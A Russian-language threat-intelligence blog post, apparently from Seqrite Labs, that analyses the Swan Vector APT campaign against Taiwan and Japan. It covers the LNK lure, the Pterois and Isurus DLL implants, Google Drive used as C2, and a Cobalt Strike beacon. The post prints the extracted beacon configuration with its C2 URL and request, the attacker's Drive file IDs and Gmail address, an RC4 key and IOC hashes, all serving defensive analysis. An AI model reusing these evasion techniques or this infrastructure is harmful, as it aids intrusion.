• Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Seqrite Labs Блог
Связаться с отделом продаж Под обстрелом?
  • Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Главная  /  Технические  / Представлена ​​APT-атака Swan Vector, нацеленная на Тайвань и Японию с различными DLL-имплантами
Представлена ​​APT-атака Swan Vector, нацеленная на Тайвань и Японию с различными DLL-имплантами
12 май 2025

Представлена ​​APT-атака Swan Vector, нацеленная на Тайвань и Японию с различными DLL-имплантами

Написано Субхаджит Сингха
Субхаджит Сингха
Технические

Контент

  • Введение
  • Первоначальные результаты.
    • Смотрим на приманку.
  • Цепочка заражения.
  • Технический анализ.
    • Этап 1 – Вредоносный LNK-скрипт.
    • Стадия 2 – Злонамеренный имплантат крыловидной мышцы.
    • Стадия 3 – Вредоносный имплант Isurus.
    • Этап 4 – Вредоносный шелл-код Cobalt Strike.
  • Инфраструктура и охота.
  • приписывание
  • Заключение
  • Seqrite Защита.
  • МНК
  • MITRE ATT&CK.

Введение

Seqrite Лаборатория APT-Team недавно обнаружила кампанию, которую мы назвали... Лебедь Вектор, которая была направлена ​​на страны Восточно-Китайского моря, такие как Тайвань и Япония. Кампания направлена ​​на учебные заведения и предприятия машиностроения и использует поддельные резюме кандидатов, которые служат приманкой.

Вся экосистема вредоносного ПО, задействованная в этой кампании, состоит из четырех этапов. Первый этап — это вредоносный LNK-файл , второй этап включает в себя запуск DLL-имплантата Pterois с помощью хорошо известного LOLBin. Третий этап, содержащий множество файлов, включая легитимный исполняемый файл Windows, использует скрытые методы для запуска и загрузки другого имплантата — Isurus — посредством DLL-сайдзагрузки. Это, в свою очередь, запускает четвертый этап — вредоносный шеллкод Cobalt Strike, загруженный Pterois.

В этой статье мы рассмотрим все тонкости и технические детали кампании, с которыми мы столкнулись в ходе анализа. Мы рассмотрим различные этапы этой кампании, начиная с анализа файла ярлыка (.LNK) и заканчивая несколькими DLL-имплантами, а также анализом шелл-кода и заключительным обзором.

Первоначальные результаты

Недавно, в апреле, наша команда обнаружила вредоносный ZIP-файл под названием歐買尬金流問題資料_20250413 (6).rar, что можно перевести как «О боже, проблема с платежным потоком – 13.04.2025 (6)» , который использовался в качестве предварительного источника заражения и содержал различные файлы, среди которых был файл LNK и файл с расширением .PNG.

ZIP-архив содержит вредоносный LNK-файл с именем詳細記載提領延遲問題及相關交易紀錄.pdf.lnk, что переводится как «Ярлык к PDF: подробная документация о проблемах с задержкой вывода средств и связанных с этим записях транзакций.pdf.lnk ». Этот файл отвечает за запуск DLL-библиотеки, замаскированной под PNG-файл Chen_YiChun.png. Затем эта DLL-библиотека запускается с помощью хорошо известного LOLBin-файла RunDLL32.exe, который дополнительно загружает другой набор вредоносных программ и PDF-файл, являющийся подделкой.

Взгляд в сторону приманки

Поскольку первый DLL-имплант, также известный как Pterois, изначально запускался через LOLBin, мы увидели файл-приманку с именем rirekisho2025, который по сути является почти японским переводом Curriculum Vitae (CV 2025), который был загружен и сохранён в каталоге Temp вместе с другими имплантами и двоичными файлами. На первой странице находится японская форма резюме/истории трудоустройства «履歴書・職歴経歴書», датированная эпохой Рэйва (令和5年4月). Форма имеет базовый заголовок с полями для личной информации, включая имя (氏名), дату, выбор пола (男/女), дату рождения, поля адреса, адрес электронной почты (E-Mail) и контактные номера. В правом верхнем углу также есть поле для фотографии. Приманка, по-видимому, в основном пустая со строками для ввода информации об образовании и истории трудоустройства. Примечательны поля, включающие записи разных лет (月), уровни степеней/квалификаций и даты работы. Внизу находятся разделы для лицензий/сертификатов и дополнительных заметок. На второй странице есть два одинаковых раздела с пометками «職歴 1» и «職歴 2» для записей трудовой книжки. Каждый раздел содержит поля для названия компании, должности, даты приема на работу и большой раздел примечаний. Поля имеют схожий макет с пробелами для названия компании/организации (会社・団体名), названия должности, дат приема на работу и сведений, связанных с работой. Также есть раздел с красным текстом, указывающий дополнительную информацию о документах или материалах (調査、調査料、ファイル等). На третьей, последней странице, есть ещё один раздел с историей занятости «職歴 3» с той же структурой, что и предыдущая страница: название компании, должность, даты работы и примечания. Ниже расположены пять дополнительных разделов с историей занятости с повторяющимися полями для названия компании, должности и дат работы, хотя они выглядят более сжато, чем предыдущие разделы. Каждый раздел следует той же схеме запроса информации о занятости в структурированном формате. Далее мы рассмотрим цепочку заражения и технический анализ.

Цепочка заражения.

Технический анализ.

Мы разделим технические возможности этой кампании на четыре части.

Этап 1 – Вредоносный LNK-скрипт.

ZIP-архив содержит вредоносный файл LNK, известный как 詳細記載提領延遲問題及相關交易紀錄.pdf.lnk, который переводится как «Подробный отчет о проблемах с задержкой вывода средств и соответствующие записи транзакций». Другое имя также встречается с тем же LNK, что и 針對提領系統與客服流程的改進建議.pdf.lnk, что переводится как Предложения по улучшению системы вывода средств и процесса обслуживания клиентов. Время создания LNK — 2025. Проанализировав содержимое этого вредоносного LNK-файла, мы обнаружили, что его единственная цель — создать экземпляр LOLBin rundll32.exe, который затем используется для выполнения вредоносного DLL-имплантата с именем Птероис. Функция экспорта имплантата Trpo с интересным аргументом 1LwalLoUdSinfGqYUx8vBCJ3Kqq_LCxIg, который мы рассмотрим в дальнейшей части этого технического анализа, а именно, как этот аргумент используется имплантатом.

Стадия 2 – Злонамеренный имплантат крыловидной мышцы.

Первоначально при исследовании вредоносного архива RAR вместе с вредоносным файлом LNK мы обнаружили еще один файл с расширением .PNG, известный как Chen_YiChun.png. Проведя первоначальный анализ, мы выяснили, что файл по сути является DLL-имплантом, и мы назвали его Птероис. Теперь давайте рассмотрим технические особенности этого имплантата. При анализе вредоносного LNK-файла мы увидели, что rundll32.exe используется для выполнения экспортной функции Trpo этого DLL-файла. Рассматривая функциональные возможности импланта, можно увидеть, что у него есть две основные функции: первая — выполнение API-хеширования, а вторая — используется для загрузки следующей стадии вредоносного ПО. Первая функция отвечает за разрешение всех API из DLL-библиотек, таких как NTDLL, UCRTBase, Kernel32 и других необходимых библиотек, а также API, требуемых для желаемых функций. Это достигается путём первоначального обращения к блоку среды процесса (PEB) для получения списка загруженных модулей. Затем код просматривает этот список, используя список InMemoryOrderModuleList, содержащий связанные структуры LDR_DATA_TABLE_ENTRY, каждая из которых представляет загруженную DLL. В каждой LDR_DATA_TABLE_ENTRY поле BaseDllName (тип UNICODE_STRING) содержит только имя файла DLL (например, ntdll.dll), а поле DllBase — её базовый адрес в памяти.

Во время обхода функция преобразует BaseDllName в строку ANSI, нормализует ее путем преобразования в верхний регистр и вычисляет регистронезависимый хеш SDBM полученной строки. Этот вычисленный хеш сравнивается с целевым хешем, предоставленным функции. Если совпадение найдено, базовый адрес соответствующей DLL-библиотеки извлекается из поля DllBase и возвращается. Теперь, после возврата базового адреса DLL, код использует аналогичный нечувствительный к регистру алгоритм хеширования SDBM для разрешения адресов функций API в NTDLL.DLL. Это достигается путём анализа таблицы экспорта DLL и вычисления SDBM-хэш каждого экспортированного имени функции и сравнение его с целевым хешем для нахождения соответствующего адреса функции. Вот простой скрипт на Python, который вычисляет и выполняет хеширование. Итак, в первой функции было решено всего четыре функции. Аналогичным образом API для двух других динамически подключаемых библиотек ucrtbase.dll и Kernel32.dll решаются таким же образом. В следующем наборе функций, где он пытается получить доступ к API из таких DLL, как Iphlapi.dll, shell32.dll и WinHTTP.dll, он сначала определяет базовый адрес DLL, как и предыдущие функции. После получения ответа он использует простую, но псевдоантианализную технику, которая использует объекты таймера для загрузки этих DLL. Первоначально он создает объект таймера с помощью RtlCreateTimerQueue, после создания объекта таймера используется другой API RtlCreateTimer для запуска функции обратного вызова, в данном случае это API LoadLibraryW, который затем используется для загрузки DLL. Затем используется GetModuleHandleW для получения дескриптора IPHLAPI.DLL. После успешного выполнения используется API RtlDeleteTimerQueue для удаления и освобождения объекта Timer. Наконец, API GetAdaptersInfo разрешается через хеш. Аналогичным образом загружаются и другие DLL-библиотеки. Далее мы рассмотрим последнюю часть импланта, а именно набор функций, отвечающих за загрузку следующего этапа. Функция начинается с получения всего параметра командной строки, состоящего из LOLBin и аргумента, который позже усекается до 1LwalLoUdSinfGqYUx8vBCJ3Kqq_LCxIg, который по сути является жестко закодированным идентификатором файла. Затем он использует технику злоупотребления Google Drive как сервер управления и контроля сначала установив аутентификацию с законным Учетные данные OAuths. Получив действительный токен доступа через правильно отформатированный обмен OAuth, он использует API Google Drive для извлечения файлов с определёнными жёстко заданными идентификаторами, включая вредоносные исполняемые файлы, библиотеки DLL и файлы конфигурации, которые он загружает по заранее определённым путям в C:\Windows\Temp.

Затем он устанавливает соответствующий заголовок Content-Type в значение «application/x-www-form-urlencoded», чтобы гарантировать корректную обработку запроса серверами аутентификации Google. После этого обмена он выполняет точный парсинг JSON, извлекая поле «access_token» из ответа Google с помощью cJSON_GetObjectItem. Анализ дампа памяти наглядно демонстрирует полученный токен OAuth, начинающийся с «ya29.a0AZYk», что подтверждает успешный процесс аутентификации. После парсинга и извлечения этот токен бережно сохраняется и впоследствии используется для авторизации вызовов API к Google Диску, что позволяет импланту загружать дополнительные полезные данные, отображаясь как легитимный трафик с Google Диска. Разобранный JSON, извлечённый из памяти, выглядит примерно так. Теперь, как только файлы загружены, другая часть этого импланта использует CreateThread для создания этих загруженных приманок и других файлов для выполнения. Наконец, эти файлы загружаются, и на экране появляется приманка, и задача имплантации Pterois выполнена. Ну, и последняя часть этого имплантата, как только вся задача выполнена, он продолжает работу и выполняет Самоудаление чтобы замести следы и снизить вероятность обнаружения.

Процедура самоудаления использует технику отложенного выполнения, запуская процесс cmd.exe, который проверяет связь с localhost перед удалением файла, гарантируя, что удаление произойдет после того, как текущий процесс завершится и освободит свои дескрипторы файлов.

Далее мы рассмотрим другой DLL-имплант, загруженный этим вредоносным загрузчиком.

Стадия 3 – Вредоносный имплант Isurus.

Предыдущий имплант загружает в общей сложности четыре образца. Один из них — легитимный двоичный файл с подписью Windows, известный как PrintDialog.exe. Теперь другой файл PrintDialog.dll, который является другим имплантом с отметкой времени компиляции 2025-04-08 03:02:59 UTC, отвечает за запуск содержимого шелл-кода, присутствующего внутри файла ra.ini, злоупотребляет очень известной техникой, известной как Загрузка DLL сбоку путем размещения вредоносной DLL-библиотеки в текущем каталоге, поскольку PrintDialog.exe явно не указывает путь, и этот имплант, который мы называем Isurus, выполняет вредоносные задачи. Взглянув на таблицу экспорта, мы видим, что вредоносный имплант экспортирует только две функции, одна из которых — обычная DllEntryPoint, а другая — вредоносная функция экспорта DllGetActivationFactory. Заглянув внутрь функции экспорта, мы видим, что этот Isurus выполняет разрешение API через хэш вместе с извлечением шелл-кода, а также загружает и выполняет шелл-код в памяти. Имплантат изначально решает проблемы API, выполняя Техника ходьбы PEB, пересекая Блок технологической среды (PEB) для определения базового адреса необходимых DLL-библиотек, таких как ntdll.dll и kernel32.dll. После определения базового адреса целевой DLL-библиотеки имплант переходит к ручному анализу PE (переносимый исполняемый файл) заголовки DLL для поиска Экспорт таблицы каталогов. Теперь, чтобы разрешить определенные API, имплантат использует алгоритм хеширования – CRC32. Вместо поиска экспорта по имени, загрузчик вычисляет хэш каждого имени функции в таблице экспорта и сравнивает его с предварительно вычисленными константами, встроенными в код, для окончательного разрешения хэшей. Теперь давайте рассмотрим, как этот имплант извлекает и загружает шелл-код. Сначала он открывает существующий файл ra.ini с правами на чтение через API CreateFileW, затем, получив дескриптор, использует другой API, GetFileSize, для чтения размера файла. После получения размера файла он обрабатывается через API ReadFile. Затем, используя жестко запрограммированный ключ RC4 wquefbqw, шелл-код расшифровывается и возвращается. После извлечения шелл-кода он выполняется непосредственно в памяти с использованием техники выполнения на основе системных вызовов. Этот подход включает загрузку соответствующих номеров системных вызовов в регистр EAX и вызов низкоуровневых системных вызовов для выделения памяти, записи шелл-кода, изменения настроек защиты памяти и, в конечном итоге, выполнения шелл-кода — всё это без использования высокоуровневых функций Windows API. Путь к PDB-файлу этого импланта также отображает его функциональность:

  • C:\Users\test\source\repos\sysldr\x64\Release\weqfdqwefq.pdb

В следующей части мы рассмотрим вредоносный шеллкод и его работу.

Этап 4 – Вредоносный шелл-код Cobalt Strike.

Изучив файл, мы обнаружили, что шелл-код зашифрован. Затем мы расшифровали шелл-код, используя ключ, с помощью простого скрипта на Python. Далее, проанализировав шеллкод, мы обнаружили, что это маяк на базе Cobalt Strike. Поэтому приводим извлечённые конфигурации. Извлеченная конфигурация маяка:

Цели процесса инъекции:
windir\syswow64\bootcfg.exe
windir\sysnative\bootcfg.exe
Инфраструктурная информация:
hxxps://52.199.49.4:7284/jquery-3.3.1.min.js
hxxps://52.199.49.4:7284/jquery-3.3.2.min.js
Текст запроса:
GET /jquery-3.3.1.min.js HTTP/1.1
Хост: 52.199.49.4:7284

Пользовательский агент: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, например Gecko) Chrome/80.0.3987.122 Safari/537.36
Принять: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8
Ссылка: http://code.jquery.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=dT98nN_EYDF96RONtS1uMjE0IZIWy9GljNoWh6rXhEndZDFhNo_Ha4AmFQKcUn9C4ZUUqLTAI6-6HUu3jA-WcnuttiUnceIu3FbAlBPitw52PirDxM_nP460iXUlVqW6Lvv__Wr3k09xnyWZN4besu1gVlk3JWS2hX_yt5EioqY
Подключение: Keep-Alive
Cache-Control: без кеша

Настройки HTTP GET Hash:
52407f3c97939e9c8735462df5f7457d
Настройки HTTP POST-хэш:
7c48240b065248a8e23eb02a44bc910a

Ввиду обширной документации и распространённости Cobalt Strike в наступательных операциях по обеспечению безопасности, углублённый анализ не представляется необходимым. Тем не менее, доступная извлечённая конфигурация маяков подтверждает, что злоумышленник использовал Cobalt Strike в качестве компонента своего инструментария для взлома в этой кампании.

Инфраструктура и охота.

В ходе обратного проектирования внедренных вредоносных программ мы обнаружили, что злоумышленник использовал Google Drive в качестве командно-контрольной (C2) платформы, что привело к утечке множества данных, таких как конфиденциальные API-ключи и многое другое. Мы также обнаружили связанные с инфраструктурой злоумышленника данные, такие как адрес электронной почты Gmail и список внедренных программ, запланированных им для других кампаний, которые не использовались в реальных условиях. Информация, относящаяся к учетной записи Google Drive злоумышленника: { “user”: { “kind”: “drive#user”, “displayName”: “Swsanavector56”, “photoLink”: “https://lh3.googleusercontent.com/a/ACg8ocKiv7cWvdPxivqyPdYB70M1QTLrTsWUb-QHii8yNv60kYx8eA=s64”, “me”: true, “permissionId”: “09484302754176848006”, “emailAddress”: “swsanavector42@gmail.com” }} Список файлов, найденных в Google Drive

Название файла ИД файла Тип Размер Хэш SHA-256
PrintDialog.exe 14gFG2NsJ60CEDsRxE5aXvFN0Fs83YMMG EXE 123,032 байт 7a942f65e8876aeec0a1372fcd4d53aa1f84d2279904b2b86c49d765e5a29d6f
PrintDialog.dll 1VMrUQlxvKZZ-fRyQ8m3Ai8ZEhkzE3g5T DLL 108,032 байт a9b33572237b100edf1d4c7b0a2071d68406e5931ab3957a962fcce4bfc2cc49
ra.ini 1JAXiUPz6kvzOlokDMDxDhA4ohidt094b ЭТО 265,734 байт 0f303988e5905dffc3202ad371c3d1a49bd3ea5e22da697031751a80e21a13a7
рирекишо2025.pdf 17hO28MbwD2assMsmA47UJnNbKB2fpM_A PDF 796,062 байт 8710683d2ec2d04449b821a85b6ccd6b5cb874414fd4684702f88972a9d4cfdd
рирекишо2021_01.pdf 1LwalLoUdSinfGqYUx8vBCJ3Kqq_LCxIg PDF 796,062 байт 8710683d2ec2d04449b821a85b6ccd6b5cb874414fd4684702f88972a9d4cfdd
wbemcomn.dll 1aY5oX6EIe4hfGD6QgAAzmCcwxM4DoLke DLL 181,760 байт c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28
svhost.exe 1P8_PG2DGtLWA3q8F4XPy43GMLznZFtQv EXE 209,920 байт e0c6f9abfc11911747a7533f3282e7ff0c10fc397129228621bcb3a51f5be980
0g9pglZr74.ini 1UE7gNfUIuTRzgjIv188hRIZG3YNtbvkV ЭТО 265,734 байт 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d
KpEvjK3KG2.enc 1RxJi1RZMhcF31F1lgQ9TJfXMuvSJkYQl ENC 265,734 байт e86feaa258df14e3023c7a74b7733f0b568cc75092248bec77de723dba52dd12
LoggingPlatform.dll 1lZgq1ZNkK88eJsl6GlcvpzRuFlBgxEOF DLL 112,640 байт 9df9bb3c13e4d20a83b0ac453e6a2908b77fc2bf841761b798b903efb2d0f4f7
0g9pglZr74.ini 1ky1fEzC6v70U8-RbHBZG_i3YI79Ir8Og ЭТО 265,734 байт 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d
python310.dll 1RuMLCJJ5hcFiVXbcg8kZK3giueWiVbTJ DLL 189,952 байт e1b2d0396914f84d27ef780dd6fdd8bae653d721eea523f0ade8f45ac9a10faf
ra.ini 13ooFQAYZ27Bx015UQG3qkHR293wlcL90 ЭТО 265,734 байт 777961d51eb92466ca4243fa32143520d49077a3f7c77a2fcbec183ebf975182
pythonw.exe 19n1ta4hyQguQQmR8C6SAsZuGNQF4-ddU EXE 97,000 байт 040d121a3179f49cd3f33f4bc998bc8f78b7f560bfd93f279224d69e76a06e92
python.xml 1k4Q18FByEXW98Rr1CXyVVC-Kj8T0NBDW XML 1,526 байт c8ed52278ec00a6fbc9697661db5ffbcbe19c5ab331b182f7fd0f9f7249b5896
OneDriveFileLauncher.exe 137tczdqf5R7RMRoOb9fI_YjZuncd_TUn EXE 392,760 байт 7bf5e1f3e29beccca7f25d7660545161598befff88506d6e3648b7b438181a75
wbemcomn.dll 1xUPkhfaWIgYs5HSmxYPC_sZT4QKm_T7i DLL 181,760 байт c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28
0g9pglZr74.ini 1Ylpf9XVnztxeGk-joNw9df3b0Mv8wYU3 ЭТО 265,734 байт 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d
svhost.exe 1wo1gZ9acixvy925lM6QAkz6Uaj6cRXxx EXE 209,920 байт e0c6f9abfc11911747a7533f3282e7ff0c10fc397129228621bcb3a51f5be980
ллв 1ZuzB7x0zzgz34eNhHp_TI3auPhHj8Xhc Папка – –

Мы также заметили, что этот адрес хоста использовался там, где Cobalt-Strike размещался под ASN. 16509 с местонахождением IP в Японии. Кроме того, помимо Google Drive C2, мы также обнаружили, что адрес Gmail использовался для создания учетных записей и выполнения действий, которые в настоящее время удалены на нескольких платформах, таких как Google Maps, YouTube и сервисы на базе Apple.

Attribution.

Хотя атрибуция остаётся ключевым аспектом при анализе текущих и будущих мотивов злоумышленников, мы обнаружили схожие методы работы с этой кампанией, особенно в плане методов загрузки DLL-файлов. Ранее APT-группа Winnti эксплуатировала PrintDialog.exe, используя этот метод. Кроме того, при изучении второго импланта, Isurus, мы обнаружили некоторое сходство с кодовой базой, используемой группой Lazarus, которая использовала методы загрузки DLL-файлов против wmiapsrv.exe – файла, обнаруженного в учётной записи злоумышленника на Google Диске. Кроме того, мы обнаружили некоторое сходство между Swan Vector и недавними целями APT10 в Японии и на Тайване.

Хотя одних этих наблюдений недостаточно для однозначной идентификации , в сочетании с лингвистическим анализом, зрелостью имплантата и другими собранными артефактами мы со средней степенью уверенности относим этого злоумышленника к восточноазиатской геосфере.

Заключение.

В результате анализа и исследования мы обнаружили, что злоумышленник базируется в Восточной Азии и действует с декабря 2024 года , атакуя многочисленные компании, занимающиеся наймом персонала, на Тайване и в Японии. В качестве основных инструментов злоумышленник использует специально разработанные вредоносные программы, включающие загрузчики, шеллкод-загрузчики и Cobalt Strike, а также применяет множество методов обхода защиты, таких как хеширование API, прямые системные вызовы, обратные вызовы функций, загрузка DLL-библиотек и самоудаление, чтобы избежать оставления каких-либо следов на целевом компьютере.

Мы полагаем, что злоумышленник будет использовать вышеупомянутые импланты, запланированные для предстоящих кампаний, которые будут использовать загрузку DLL-библиотек через сторонние источники против таких приложений, как Python, WMI Performance Adapter Service, исполняемый файл OneDrive Launcher, для запуска своего вредоносного маяка Cobalt Strike с использованием приманок на основе CV.

Seqrite Защита.

  • Птероис.С36007342.
  • Троян.49524.GC
  • троян.49518.GC.

Индикаторы компромисса (IOC)

Приманки (PDF-файлы)

Имя файла SHA-256
рирекишо2021_01.pdf 8710683d2ec2d04449b821a85b6ccd6b5cb874414fd4684702f88972a9d4cfdd
рирекишо2025.pdf 8710683d2ec2d04449b821a85b6ccd6b5cb874414fd4684702f88972a9d4cfdd

IP/домены

IP
52.199.49.4:7284

Вредоносные имплантаты

Имя файла SHA-256
wbemcomn.dll c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28
LoggingPlatform.dll 9df9bb3c13e4d20a83b0ac453e6a2908b77fc2bf841761b798b903efb2d0f4f7
PrintDialog.dll a9b33572237b100edf1d4c7b0a2071d68406e5931ab3957a962fcce4bfc2cc49
python310.dll e1b2d0396914f84d27ef780dd6fdd8bae653d721eea523f0ade8f45ac9a10faf
Chen_YiChun.png de839d6c361c7527eeaa4979b301ac408352b5b7edeb354536bd50225f19cfa5
針對提領系統與客服流程的改進建議.pdf.lnk 9c83faae850406df7dc991f335c049b0b6a64e12af4bf61d5fb7281ba889ca82

Шеллкод и другие подозрительные двоичные файлы

Имя файла SHA-256
0g9pglZr74.ini 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d
ra.ini 0f303988e5905dffc3202ad371c3d1a49bd3ea5e22da697031751a80e21a13a7
python.xml c8ed52278ec00a6fbc9697661db5ffbcbe19c5ab331b182f7fd0f9f7249b5896
KpEvjK3KG2.enc e86feaa258df14e3023c7a74b7733f0b568cc75092248bec77de723dba52dd12

MITRE ATT&CK.

тактика Идентификатор техники Название техники Идентификатор подтехники Название подтехники
Первоначальный доступ T1566 Фишинг T1566.001 Вложение для целевого фишинга
Типы T1129 Общие модули
Типы T1106 Родной API
Типы T1204 Пользовательское исполнение T1204.002 Вредоносный файл
Настойчивость T1574 Поток выполнения захвата T1574.001 Загрузка DLL-файлов
Повышение привилегий T1055 Инъекция процесса T1055.003 Перехват выполнения потока
Повышение привилегий T1055 Инъекция процесса T1055.004 Асинхронный вызов процедуры
Уклонение от защиты T1218 Выполнение системного двоичного прокси-файла T1218.011 Rundll32
Уклонение от защиты T1027 Замаскированные файлы или информация T1027.007 Динамическое разрешение API
Уклонение от защиты T1027 Замаскированные файлы или информация T1027.012 Контрабанда иконок LNK
Уклонение от защиты T1027 Замаскированные файлы или информация T1027.013 Зашифрованный/кодированный файл
Уклонение от защиты T1070 Удаление индикатора T1070.004 Удаление файла
Управление и контроль T1102 Веб-сервис

 предыдущий постУязвимость безопасности в Yelp Help Viewer (CVE-2025-3155)
Следующий пост  Защитите самое важное с помощью обнаружения и классификации данных
Субхаджит Сингха

О Субхаджите Сингхе

Субхаджит работает исследователем в области безопасности в лаборатории безопасности компании Quick Heal. Сфера его интересов: threat intelлингвистика, исследования, а также обратное проектирование для...

Статьи Субхаджита Сингхи »

Похожие статьи

  • Злоупотребление проверенными бизнес-процессами: многоэтапная кампания по краже данных из-за чужих ресурсов.

    Июль 22, 2026
  • За кулисами возврата средств: от фишинга GST до RAT-программы Remcos через многоступенчатую цепочку заражения .NET.

    Июль 17, 2026
  • Операция ShadowRecruit: Кампания по распространению вредоносного ПО, ориентированная на поиск работы и использующая ControlR и Google Sheets для атаки на соискателей из Индии.

    Июль 14, 2026
Избранные авторы
  • Seqrite
    Seqrite

    Seqrite является ведущим поставщиком решений в области корпоративной кибербезопасности. Специализируется на...

    Прочитайте больше статей Seqrite
  • Джоти Карлекар
    Джоти Карлекар

    Я страстный писатель, которому нравится создавать контент о новых технологиях и...

    Прочтите другие статьи Джоти Карлекара
  • Бинеш П.
    Бинеш П.

    Я страстный энтузиаст кибербезопасности и преданный писатель. Обладая талантом...

    Читайте другие статьи Бинеша П.
  • Санджай Каткар
    Санджай Каткар

    Санджай Каткар — соуправляющий директор Quick Heal Technologies...

    Читайте другие статьи Санджая Каткара
Темы
склонный (25) Cyber-атака (36) кибер-атаки (58) кибератаки (16) кибератаки (15) Информационная безопасность (341) информационная безопасность (34) Киберугроза (33) кибер-угрозы (51) Данные нарушения (56) нарушения данных (29) Потеря данных (28) предотвращение потери данных (34) data privacy (16) защита данных (34) безопасность данных (19) DLP (50) ДПДП (14) ДПДПА (17) Шифрование (16) для защиты конечных точек (113) Безопасность предприятия (20) Эксплуатировать (13) GDPR (14) вредоносных программ (76) анализ вредоносных программ (14) вредоносная атака (23) МДМ (27) Microsoft (15) MITRE ATT & CK (14) Сетевая безопасность (26) фишинг (30) Ransomware (69) атака ransomware (31) атаки ransomware (31) защита от копирования (17) Seqrite (41) Seqrite Шифрование (27) Seqrite EPS (33) Seqrite Услуги (16) обнаружение угрозы (14) Threat Intelлигенция (21) UTM (34) Уязвимость (16) нулевое доверие (13)
Seqrite Labs

Ведущий поставщик решений по корпоративной ИТ-безопасности, упрощающий защиту конечных точек, данных и сетей с помощью лучших в своем классе решений по предотвращению, обнаружению и реагированию на угрозы по всему миру.

Подробнее о Seqrite

Наши соцсети:

Подпишитесь на нашу рассылку

Будьте в курсе последних тенденций и новостей в сфере кибербезопасности.

Загрузка
Продукция и Услуги
  • облако
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • На Прем
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Платформа
  • Malware Analysis Platform
  • Микро Бизнес
  • SOHO Total Edition
  • Услуги
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Кибербезопасность и Data Privacy Awareness
Ресурсы
  • статьи
  • Статьи
  • Даташит
  • Отчеты об угрозах
  • Руководства
  • точка зрения
  • Понимание Data Privacy
  • Диалоги ДПДП
  • Политика и соответствие
  • Лицензионное соглашение
  • GoDeep.AI
  • SIA
  • Час конфиденциальности
Свяжитесь с нами
  • Зарегистрированные офисы
  • Давайте поговорим о кибербезопасности
Поддержка
  • Техподдержка
  • Загрузка программного обеспечения
  • Автономное обновление
  • Обновление прошивки
  • Обновления
  • Документация
О Нас
  • О нас Seqrite
  • Руководство
  • Награды и признание
  • Новости
Сотрудничайте
  • Партнерская программа
  • Найти партнера
  • Стать партнером
  • Seqrite Сертификаты

© 2026 Quick Heal Technologies Ltd.

Карта сайта Политика конфиденциальности Юридическая информация Политика использования файлов cookie Условия эксплуатации